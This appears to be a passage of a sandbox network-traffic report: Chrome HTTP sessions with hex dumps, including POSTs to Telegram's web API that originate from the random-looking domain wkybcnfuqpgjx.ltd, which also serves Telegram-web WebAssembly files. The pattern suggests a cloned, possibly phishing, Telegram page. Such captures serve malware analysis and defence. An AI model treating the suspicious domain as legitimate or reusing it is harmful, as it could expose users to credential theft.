                                  2025-01-12 00:03:57 UTC16384INData Raw: fe 9d 9d 7f 5f 65 5e d6 49 0a b3 ae 92 8d 08 2f 26 14 c7 4b f5 a2 1d f6 40 d2 c7 ef 68 31 58 07 e1 ad fd ea 89 21 b5 db c5 ba d8 9b 49 44 3c dc c4 26 2f 18 c0 f2 c2 99 2a f9 3d c1 76 e9 0a 1e dc 49 a1 f3 90 48 3b 53 f4 fb 85 e5 62 6a 9d e2 0a 80 22 c8 cb 82 56 36 81 09 56 87 d3 90 e8 ff 46 50 f5 9b 14 bd 7b 1f fc e4 62 fc 86 f6 82 57 46 92 9b c1 a3 cf 90 04 02 74 0e 97 9e 83 27 e7 99 d1 c5 8f 99 3a 67 3c 29 bf 54 d0 d3 fb 0a a5 a3 a7 e2 77 67 bb 02 2b af 68 26 36 fe ce b0 10 73 16 53 92 53 34 7c 99 3f 29 ff d1 1d bc e8 92 47 af 63 23 e0 ec 2f ca 71 0c ce 98 81 34 b5 8e 94 44 47 ad e3 09 51 9a 4d 96 e6 61 a8 67 ab 27 76 00 84 84 aa a9 67 9c e0 a9 04 83 d3 97 8b 95 6d 1f 18 f7 6f c4 d7 74 ce 83 12 c0 24 17 d5 d5 32 74 19 c5 14 62 a0 49 09 30 f2 18 da 91 af
                                  Data Ascii: _e^I/&K@h1X!ID<&/*=vIH;Sbj"V6VFP{bWFt':g<)Twg+h&6sSS4|?)Gc#/q4DGQMag'vgmot$2tbI0
                                  2025-01-12 00:03:57 UTC16384INData Raw: e1 7a b4 73 37 f8 e0 1c 47 76 bb 0d 98 f0 6c d3 ca e3 83 f3 5e 46 16 de 08 21 36 b4 b3 1e b5 9d de 78 15 ff 31 73 01 1c bf 32 2f f3 d7 a4 89 e5 cf e5 01 8a 3c a6 bf 92 c7 fc 0d 12 e0 a9 30 5c 57 2e eb c2 25 4d ef f6 0e 01 d2 dd 9f 11 80 01 59 d8 d2 79 a4 79 49 3f 4b ca ea c5 3d e8 c3 30 0e 78 cc 10 07 51 9b cd d2 c2 53 67 53 d4 e4 9e f6 6e 14 6d e3 68 93 82 76 f0 7c 87 a4 42 4b 38 d6 01 5e 18 71 29 e0 54 f3 19 2d 65 f5 45 64 e4 21 e8 82 6a b0 fb c8 0f c3 70 a5 ff de 42 76 2d b4 89 38 03 79 47 ed f7 e7 c0 d7 0b a6 0d 4d 9e 50 f6 5c f2 90 2a e0 24 90 47 29 99 f0 75 86 8d 1c c7 45 f2 ab 43 f0 39 bb 21 8c 84 0c 11 bc 7a e7 0a 6f af 25 ba 37 27 61 f2 bd 9d 1d 13 2f 32 77 c1 e2 d3 1c f0 3e 35 fe ad 80 95 2e 4c 35 1c e2 c5 87 c9 92 8a c9 40 f3 52 9f 5e 57 35 bd
                                  Data Ascii: zs7Gvl^F!6x1s2/<0\W.%MYyyI?K=0xQSgSnmhv|BK8^q)T-eEd!jpBv-8yGMP\*$G)uEC9!zo%7'a/2w>5.L5@R^W5
                                  2025-01-12 00:03:57 UTC16384INData Raw: da 6f bb a5 5a a1 8b 7a 55 48 de 27 10 81 39 f9 51 35 46 8d 1e ba 11 43 25 ff c1 d1 05 74 b2 a6 58 f7 a9 62 6c 31 29 28 3a 31 97 44 79 f5 5a 57 d1 28 b3 8d 55 2c 6d 9f 90 dc 93 b5 d5 d1 71 28 7c 35 ca 45 6e c0 e0 b9 23 3d 8d 1c 20 86 ad 85 46 94 5c 02 cf 39 c8 af 1a 52 cc b6 24 3d 59 c7 94 b5 f0 74 ed 99 8e 5e 33 10 4a 1c c5 c2 40 d0 a0 0a b3 fc 17 08 51 92 e6 78 52 31 6d f2 0d 6b cf cc 6a 13 c4 0e 61 b5 70 94 90 97 7c ce e5 16 78 15 43 99 ae 2f b4 bb 21 11 32 78 df be 50 30 1f e4 e3 14 74 52 80 6e 5a ed b3 6d cc ef 37 62 26 2a 0e 9e ab 31 f9 51 e7 97 18 00 ce 2a 37 ca 88 3a a3 93 71 b9 8a 5b 7e cd 9a a8 8d f6 01 f4 23 c9 9f f3 c1 bd 85 de 2b b4 61 26 74 be 16 e2 ab a4 31 d0 96 ff 25 f4 e7 58 a6 b6 0d 0d 5c 54 5c cb ca 4e 19 01 ce 93 4b 5a b8 33 fe a9 39
                                  Data Ascii: oZzUH'9Q5FC%tXbl1)(:1DyZW(U,mq(|5En#= F\9R$=Yt^3J@QxR1mkjap|xC/!2xP0tRnZm7b&*1Q*7:q[~#+a&t1%X\T\NKZ39
                                  2025-01-12 00:03:57 UTC16384INData Raw: da d8 1c 22 50 68 0a 57 0c db d0 6f 8c df 18 2e b3 e8 3b 96 2a 5a b4 f2 4d 0e 81 b2 e6 cd 0c 09 e4 69 f0 db be e4 4c 70 15 c4 1d 55 db 92 de a4 ac 7f d2 31 4a 6c 91 c1 32 48 de 51 58 29 c5 2c 49 67 40 15 79 65 07 6f 5b f9 d1 08 77 f5 11 b3 3e 6d 83 25 3b 6d a1 a4 d9 55 94 c4 a1 fa a9 93 2e d8 c4 d9 41 c4 d8 bb ea b9 13 61 28 45 b0 39 10 13 bd 8e 98 5c 5a bf 09 e7 09 7c 16 76 05 0f 9c 83 ae 34 d5 05 d2 7b f4 25 ad f7 c2 ca cb 5e 04 28 d7 ea 03 8a de d1 6e 2a 82 e6 31 f3 c9 2d 04 69 76 e3 3c e0 f5 1d 19 38 05 35 59 52 cd 4c cc 90 2c 91 37 72 e0 12 eb e1 74 73 f1 98 7a 22 b4 13 99 85 79 65 c2 80 83 45 c3 a7 ef 4a b4 91 19 49 d4 96 6e 34 62 1a c1 d0 5c 0d 2a a1 a1 7b da 2b ef 53 d3 35 36 fd 04 2f a3 dd 0c 6d 9d 46 de fe fa dc 0d c1 b7 d1 51 c8 26 80 6d e0 09
                                  Data Ascii: "PhWo.;*ZMiLpU1Jl2HQX),Ig@yeo[w>m%;mU.Aa(E9\Z|v4{%^(n*1-iv<85YRL,7rtsz"yeEJIn4b\*{+S56/mFQ&m
                                  2025-01-12 00:03:57 UTC16384INData Raw: 5a 81 c8 09 ec 1e 30 7b 8b f2 b2 0d 4a 5e ba 19 24 3a 20 ff 0d 99 d3 c4 38 65 1b bf be 07 98 09 0a 9b 30 23 95 70 fe 8a ba 70 fb 91 a4 13 69 70 13 86 85 66 40 48 ad ac 8b 03 d2 33 df 56 f1 13 ab ac 84 a8 25 a5 fa d0 20 1d 7a e4 54 ba 94 1f cc bb ce a2 b7 80 53 9a 67 1d b4 00 7c ff 9c 17 4d 42 a0 7e 83 7b a4 10 08 60 f2 2e fa 86 fa a5 63 03 b4 ea 95 ba 13 88 6e 2f cd be 18 9d d3 c0 e7 04 51 89 99 27 24 47 c9 07 31 1b 98 fb e3 cf 7a 95 e0 7f 4c 59 6a d9 f5 7d 12 80 34 df b2 e4 18 ba 46 b3 77 f9 a6 d9 f8 3a 3d 35 c0 0d af 17 2f 62 c7 36 b8 b0 93 9d 14 12 8c 1b d2 35 30 41 15 d9 e7 8e ce 38 30 26 0c 9f 83 41 75 ed 0a 6a 75 de c0 aa a6 80 44 a7 60 eb 44 27 9f 43 0a 1a 24 19 95 85 07 ec d1 1e 82 0c e9 ff f3 77 11 aa cd e7 0c 40 a9 48 ad 76 a3 4d 44 8d 95 3b db
                                  Data Ascii: Z0{J^$: 8e0#ppipf@H3V% zTSg|MB~{`.cn/Q'$G1zLYj}4Fw:=5/b650A80&AujuD`D'C$w@HvMD;
                                  2025-01-12 00:03:57 UTC16384INData Raw: e6 a7 fd c6 f2 05 76 b9 28 19 3d 62 22 03 a4 54 09 15 e2 29 59 63 b9 6e 1f 02 a2 80 47 e8 a2 99 ea ec ad bf 85 f2 b9 e6 9a 5c 7c df b4 36 3b 71 d5 7e a0 45 61 e1 fa ed fb 07 ba ac d8 5f 66 18 12 67 cf 30 ba 66 bd 46 34 b1 a4 8d 38 5f e0 f8 e1 61 39 20 40 b3 4a 5e 11 e3 fd f7 67 ff 7e 8a 77 0c 82 d4 e5 9b 00 df 10 eb 83 3a 2d 30 b5 44 30 c2 59 30 0c c6 6a 45 15 ed e3 e1 7c ed 93 8b 54 26 36 0c f1 84 fe e9 03 e0 88 09 3a a4 d4 8f 4a 59 f5 df 28 83 47 74 c5 18 2c 97 99 7e 9a bd a2 77 81 ea 6a f0 76 cc 20 e7 77 bc 3f 8b 15 b3 61 81 5c a5 82 b1 fd 01 a8 5e ea fb ff 93 8c 65 9a de 41 05 ef 46 e7 eb 4d 21 9a 63 a7 3a a4 fe 23 e6 aa 89 52 0a 9b 05 ea c6 b7 da 26 92 86 05 9c 1a 36 27 c2 6f 69 aa 01 e4 ac 2d 1e 9c 6e 36 4a e4 fc 89 e1 7f 26 67 c7 97 4a b2 2d d3 dc
                                  Data Ascii: v(=b"T)YcnG\|6;q~Ea_fg0fF48_a9 @J^g~w:-0D0Y0jE|T&6:JY(Gt,~wjv w?a\^eAFM!c:#R&6'oi-n6J&gJ-
                                  2025-01-12 00:03:57 UTC16384INData Raw: c3 ff 1c aa e1 15 57 24 57 5e 54 df fa 69 cd ec 55 9b ed 98 57 35 eb f4 96 6a f4 47 ae b5 cb de f2 71 88 09 5c be 51 28 78 50 3f 1d 3c b2 a9 7d 78 d9 c2 f3 6c 8f 30 cd 2c 49 80 4a ee b9 9d 08 66 11 5a 17 0f ed 3f 3c ee f8 54 f1 25 ea bd ac a1 0d df 83 36 2e 67 e1 e1 13 89 9a 89 6a fc 63 f7 89 68 c4 b8 1a f3 88 af 35 01 57 8f 9e 0e 2d ff 73 f9 6d 04 aa 3b 22 40 3f 2f 35 2d 20 99 43 c7 7b 5e 45 4b 9b a7 0f d0 89 1d f0 35 dd 36 7c 9b 39 4a f7 14 37 2d dd 27 83 ba 6b d5 52 54 1b f3 87 2e 0d f3 da 17 b7 25 ed ba b7 7f 75 19 cd 44 9b a6 58 90 1b 66 55 b8 91 3a 5e 00 f5 4d d4 fe 37 72 25 4a 24 20 4f b4 2e b1 55 2b 13 1b 43 6a d8 61 7e 14 08 86 54 c3 ff 7b da 1d bf 55 fe f8 67 3e 9f d3 35 d8 de 8c 1d 5f ef 45 ca a5 09 9f 23 57 b2 70 5a 65 54 2a 9c 07 80 a6 41 f8
                                  Data Ascii: W$W^TiUW5jGq\Q(xP?<}xl0,IJfZ?<T%6.gjch5W-sm;"@?/5- C{^EK56|9J7-'kRT.%uDXfU:^M7r%J$ O.U+Cja~T{Ug>5_E#WpZeT*A
                                  2025-01-12 00:03:57 UTC16384INData Raw: 0a 2a 1b d1 97 d0 61 b9 07 aa ab b6 cd e3 91 f9 27 f0 98 92 73 f8 74 7c aa 3b e3 2c 13 24 bd db db de 30 6d 89 92 bc c2 aa 1e a9 61 56 91 76 8c 77 cc ee 46 71 89 49 23 36 42 4c ac e4 11 ed 4a a9 6f f8 a7 02 49 d8 d9 e5 e4 27 24 b6 0e 66 00 ad ed 16 30 d0 d2 f0 7c fe 0f ee 09 90 48 9e 61 1b cf 21 ee e3 46 80 94 6d 49 e7 66 dc b6 77 02 03 87 5b e4 b2 33 f4 d5 6d 86 f8 cd db 22 47 91 ef d1 97 02 76 6f d4 1f 6d 07 1c 4b d7 f0 cf 46 e8 6b a2 79 42 78 08 93 54 6b f4 15 bb b6 81 5c 5a c0 47 39 59 f4 11 62 7d 9b 18 c6 b7 fc 86 80 d3 b8 bb ea e2 2a 6d 83 4a 71 17 67 83 60 7a e8 63 be bd e2 9b d6 23 6a 44 75 5b 23 98 b0 a5 cf 20 cb d8 9c 88 d8 ac b9 4e 02 99 c1 97 8a 35 50 11 b2 e0 c8 bd 0f 3a 1c 89 23 e9 be 6e 3c 58 d7 07 e7 9b 9b 82 85 48 05 a1 41 6f 13 5d 5e 6f
                                  Data Ascii: *a'st|;,$0maVvwFqI#6BLJoI'$f0|Ha!FmIfw[3m"GvomKFkyBxTk\ZG9Yb}*mJqg`zc#jDu[# N5P:#n<XHAo]^o


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  73192.168.2.649946149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:57 UTC350OUTGET /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:57 UTC312INHTTP/1.1 404 Not Found
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:57 GMT
                                  Content-Type: text/html
                                  Content-Length: 169
                                  Connection: close
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  2025-01-12 00:03:57 UTC169INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 30 2e 33 2e 33 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/0.3.33</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  74192.168.2.649947149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:57 UTC450OUTPOST /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  Content-Length: 184
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:57 UTC184OUTData Raw: 2a 10 06 78 25 cb 00 4d 0a cf 09 0b d1 b2 3e c8 53 d7 bc 68 93 b7 26 b2 b0 c1 77 8f 47 0e 31 93 be 1a ad 61 4e 06 81 7b 59 df 98 22 24 e6 35 ce 7f 10 81 89 b1 1f 14 85 5b 82 34 d4 70 6c 96 3c 62 31 1d b2 bd 7a bd a5 2b de 2e e0 94 a8 00 e2 77 21 ee e4 26 b9 cd 42 e5 c6 06 fd 2e 41 1c ed 4c b0 4c 98 ad c8 ea 78 07 28 ce e3 8d 5b 9a 83 3b f5 65 c9 ee 24 fe c3 06 01 e6 d5 84 64 78 37 d3 27 e8 0b 03 aa ca 70 ee e5 17 66 d5 ac ac 39 c6 d4 00 e3 a5 fd 35 2c 7e 72 a1 96 1c d7 ed 37 a9 e5 3e ed 2a 37 cf e9 84 31 59 ec 6b 9b ec 20 ae b0 bb 75 5a 17 34 61
                                  Data Ascii: *x%M>Sh&wG1aN{Y"$5[4pl<b1z+.w!&B.ALLx([;e$dx7'pf95,~r7>*71Yk uZ4a
                                  2025-01-12 00:03:57 UTC408INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:57 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 648
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:03:57 UTC648INData Raw: 2a 10 06 78 25 cb 00 4d 22 54 63 7d ef 65 cf 0c 15 f2 97 d4 30 9c 62 a6 05 93 d7 8b e8 b2 a9 30 43 80 3d 2b 95 3f 9a d4 bd 6b c6 15 dc 14 2c 68 07 af 3e f7 36 f6 35 43 b6 d9 12 cd a1 81 f9 49 7c 16 db b8 20 aa f3 c7 31 4b bb 41 73 8c ef 95 b8 9f f3 4b 59 42 73 dc fa 0a cf bd 8f dc 51 d6 78 06 9a 1d 99 91 f0 94 42 96 5a f9 49 f2 24 c4 70 0a 16 99 c7 a1 50 0b ec 72 b6 86 d8 b6 12 9b 74 35 46 66 71 8b e1 43 d3 09 e9 bd 92 8e 5b 99 6c f9 f5 e8 ba 6c ce 7f 11 6b 60 2a b1 e7 24 d7 96 bc aa c2 72 69 c8 31 dd a3 0b ec e4 c2 ff 20 13 0d de b2 dc fc 4a 2d 14 c5 44 82 06 a3 fa a8 f9 b7 b2 78 92 ea 27 d3 16 42 f3 5f da 88 f2 af fd 24 53 63 79 72 ed 8d 60 d0 a1 98 c7 f1 a5 b4 03 5f 6d 48 a9 b7 8e ed 42 a7 bf 50 49 2d ea 6f 70 cb 46 74 01 b7 3f 2b e3 3b 32 a6 bf 39 87
                                  Data Ascii: *x%M"Tc}e0b0C=+?k,h>65CI| 1KAsKYBsQxBZI$pPrt5FfqC[llk`*$ri1 J-Dx'B_$Scyr`_mHBPI-opFt?+;29


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  75192.168.2.649950149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:57 UTC450OUTPOST /apiw1 HTTP/1.1
                                  Host: zws2-1.web.telegram.org
                                  Connection: keep-alive
                                  Content-Length: 0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:57 UTC312INHTTP/1.1 404 Not Found
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:57 GMT
                                  Content-Type: text/html
                                  Content-Length: 169
                                  Connection: close
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  2025-01-12 00:03:57 UTC169INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 30 2e 33 2e 33 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/0.3.33</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  76192.168.2.649955172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:57 UTC486OUTGET /rlottie-wasm.wasm HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  Accept: */*
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/2976.4e6e9b1254ce313f06c5.js
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  Range: bytes=275924-317583
                                  If-Range: "674840b0-4d890"
                                  2025-01-12 00:03:58 UTC907INHTTP/1.1 206 Partial Content
                                  Date: Sun, 12 Jan 2025 00:03:58 GMT
                                  Content-Type: application/wasm
                                  Content-Length: 41660
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:40 GMT
                                  ETag: "674840b0-4d890"
                                  Content-Range: bytes 275924-317583/317584
                                  cf-cache-status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FZ2nYnj5nRg%2F9T9SZzxCqBiWlSQfPWpvDYm8BF4Gx8e3mvMaQYgkCLCzWYj1SHxtVtlLhmTnX3ICThYc3DPMzELaVNWxbTpnwg%2B0UMmXavxGMAL6tQHEEpPx7LDTr9jISlEnEQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2ef3dfe7cb4-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1809&min_rtt=1808&rtt_var=681&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1064&delivery_rate=1602634&cwnd=232&unsent_bytes=0&cid=a21696c6fb23b440&ts=602&x=0"
                                  2025-01-12 00:03:58 UTC462INData Raw: 00 20 01 10 ee 05 0f 0b 20 00 20 01 10 8a 11 0b a7 02 01 03 7f 20 00 10 89 11 20 00 28 02 00 21 02 20 01 10 23 41 03 46 04 40 20 01 10 74 20 01 10 2e 22 00 04 40 20 02 41 14 6a 21 03 03 40 02 40 20 00 41 d1 37 10 1c 45 04 40 20 02 20 01 10 9b 01 3a 00 1c 0c 01 0b 20 00 41 d5 37 10 1c 45 04 40 02 40 02 40 02 40 02 40 20 01 10 51 22 00 45 0d 00 20 00 2c 00 00 22 00 41 ed 00 4c 04 40 20 00 41 9a 7f 6a 22 04 41 03 4b 04 40 20 00 41 e1 00 47 0d 02 20 02 41 01 36 02 20 0c 07 0b 20 04 41 01 6b 0e 03 01 01 03 04 0b 20 00 41 f3 00 46 0d 01 0b 20 02 41 00 36 02 20 0c 04 0b 20 02 41 02 36 02 20 0c 03 0b 20 02 41 03 36 02 20 0c 02 0b 20 02 41 04 36 02 20 0c 01 0b 20 00 41 da 37 10 1c 45 04 40 20 01 20 02 10 98 09 0c 01 0b 20 00 41 dd 37 10 1c 45 04 40 20 01 20 03 10
                                  Data Ascii: (! #AF@ t ."@ Aj!@@ A7E@ : A7E@@@@@ Q"E ,"AL@ Aj"AK@ AG A6 Ak AF A6 A6 A6 A6 A7E@ A7E@
                                  2025-01-12 00:03:58 UTC1369INData Raw: 10 20 00 20 02 28 02 00 10 27 20 02 10 3e 10 7c 20 02 10 7b 20 01 41 30 6a 24 00 0b 85 01 00 20 00 10 23 41 06 46 04 40 20 00 20 01 10 b0 05 10 f1 02 0f 0b 02 40 20 00 10 23 41 04 46 04 40 20 00 10 6c 02 40 20 00 10 38 45 0d 00 03 40 20 00 10 23 41 03 46 04 40 20 00 20 01 10 8d 09 10 86 10 20 00 10 38 0d 01 0c 02 0b 0b 20 00 10 23 41 06 47 0d 02 20 00 20 01 10 b0 05 10 f1 02 0b 0f 0b 41 e1 35 41 cc 34 41 95 10 41 88 e1 00 10 00 00 0b 41 b2 34 41 cc 34 41 a2 10 41 88 e1 00 10 00 00 0b 57 01 02 7f 23 00 41 20 6b 22 03 24 00 20 00 10 1d 22 02 20 03 41 08 6a 20 00 20 00 10 24 41 01 6a 10 e7 01 20 00 10 24 20 02 10 a1 05 22 02 28 02 08 20 01 10 8d 04 20 02 20 02 28 02 08 41 08 6a 36 02 08 20 00 20 02 10 be 03 20 02 10 bd 03 20 03 41 20 6a 24 00 0b 29 01 01 7f
                                  Data Ascii: (' >| { A0j$ #AF@ @ #AF@ l@ 8E@ #AF@ 8 #AG A5A4AAA4A4AAW#A k"$ " Aj $Aj $ "( (Aj6 A j$)
                                  2025-01-12 00:03:58 UTC1369INData Raw: 72 6a 2d 00 00 21 04 20 00 20 00 10 1e 41 7f 6a 10 2f 20 04 41 c0 3b 6a 2d 00 00 41 0c 74 22 04 20 03 41 c0 3b 6a 2d 00 00 41 12 74 72 41 10 76 3a 00 00 20 05 41 02 72 22 03 20 02 4f 0d 00 20 01 20 03 6a 2d 00 00 22 01 41 3d 46 0d 00 20 00 20 01 41 c0 3b 6a 2d 00 00 41 06 74 20 04 72 41 10 74 41 18 75 10 d9 02 0b 0b ec 03 02 05 7f 01 7d 23 00 41 20 6b 22 05 24 00 20 01 10 27 1a 20 02 10 a4 05 21 08 20 01 10 c2 01 21 06 20 05 41 00 3a 00 1f 02 40 02 40 20 06 45 0d 00 20 01 20 08 20 06 10 68 22 09 10 3b 28 02 00 22 07 45 0d 00 03 40 20 07 28 02 00 22 07 45 0d 01 20 08 20 07 28 02 04 47 04 40 20 07 28 02 04 20 06 10 68 20 09 47 0d 02 0b 20 01 10 5b 20 07 41 08 6a 20 02 10 a9 03 45 0d 00 0b 0c 01 0b 20 05 41 10 6a 20 01 20 08 41 ac df 00 20 03 20 04 10 9e 10
                                  Data Ascii: rj-! Aj/ A;j-At" A;j-AtrAv: Ar" O j-"A=F A;j-At rAtAu}#A k"$ ' ! ! A:@@ E h";("E@ ("E (G@ ( h G [ Aj E Aj A
                                  2025-01-12 00:03:58 UTC1369INData Raw: 01 0b 20 00 41 da 35 10 1c 45 04 40 20 03 41 00 3a 00 00 20 01 10 23 41 04 47 0d 0c 20 01 10 6c 41 01 21 00 20 01 10 38 04 40 03 40 20 02 41 20 6a 20 01 41 00 10 a2 09 20 02 41 20 6a 10 33 04 40 20 00 41 01 71 21 09 41 00 21 00 20 09 04 40 20 02 28 02 20 2d 00 0c 21 00 0b 20 07 20 02 41 20 6a 10 b7 05 0b 20 02 41 20 6a 10 28 20 01 10 38 0d 00 0b 0b 20 03 20 00 41 01 71 3a 00 01 0c 01 0b 20 01 10 54 0b 20 01 10 2e 22 00 0d 00 0b 20 03 2d 00 00 41 01 47 0d 02 20 08 45 0d 01 20 04 41 05 41 9a 36 41 9a 36 10 da 01 10 a1 07 0d 02 20 02 41 10 6a 20 04 10 a1 11 20 03 20 02 41 10 6a 10 a9 0a 20 02 41 10 6a 10 20 1a 0c 02 0b 20 03 2d 00 00 41 01 47 0d 01 0b 20 02 41 20 6a 20 01 41 80 01 6a 20 05 10 a0 11 20 02 20 02 41 20 6a 20 04 10 29 20 04 10 1e 10 f5 04 10 a1
                                  Data Ascii: A5E@ A: #AG lA! 8@@ A j A A j3@ Aq!A! @ ( -! A j A j( 8 Aq: T ." -AG E AA6A6 Aj Aj Aj -AG A j Aj A j )
                                  2025-01-12 00:03:58 UTC1369INData Raw: 0c 10 9a 01 20 01 28 02 00 20 02 28 02 24 36 02 40 20 01 28 02 00 20 02 28 02 28 36 02 44 20 02 41 d0 00 6a 20 00 41 8c 01 6a 10 a4 11 20 00 41 e4 00 6a 20 03 41 18 6a 10 80 02 0b 20 03 41 18 6a 10 28 20 03 41 20 6a 24 00 0f 0b 41 ff 34 41 cc 34 41 b4 04 41 99 35 10 00 00 0b 41 ac 35 41 cc 34 41 bc 04 41 99 35 10 00 00 0b 41 b2 34 41 cc 34 41 bf 04 41 99 35 10 00 00 0b 41 b2 34 41 cc 34 41 c2 04 41 99 35 10 00 00 0b 41 b2 34 41 cc 34 41 c5 04 41 99 35 10 00 00 0b 41 b2 34 41 cc 34 41 c8 04 41 99 35 10 00 00 0b 41 b2 34 41 cc 34 41 cb 04 41 99 35 10 00 00 0b ad 01 01 05 7f 23 00 41 10 6b 22 03 24 00 20 00 10 27 1a 20 01 10 a4 05 21 04 02 40 02 40 20 00 10 c2 01 22 05 45 0d 00 20 00 20 04 20 05 10 68 22 06 10 3b 28 02 00 22 02 45 0d 00 20 02 28 02 00 22 02
                                  Data Ascii: ( ($6@ ( ((6D Aj Aj Aj Aj Aj( A j$A4A4AA5A5A4AA5A4A4AA5A4A4AA5A4A4AA5A4A4AA5A4A4AA5#Ak"$ ' !@@ "E h";("E ("
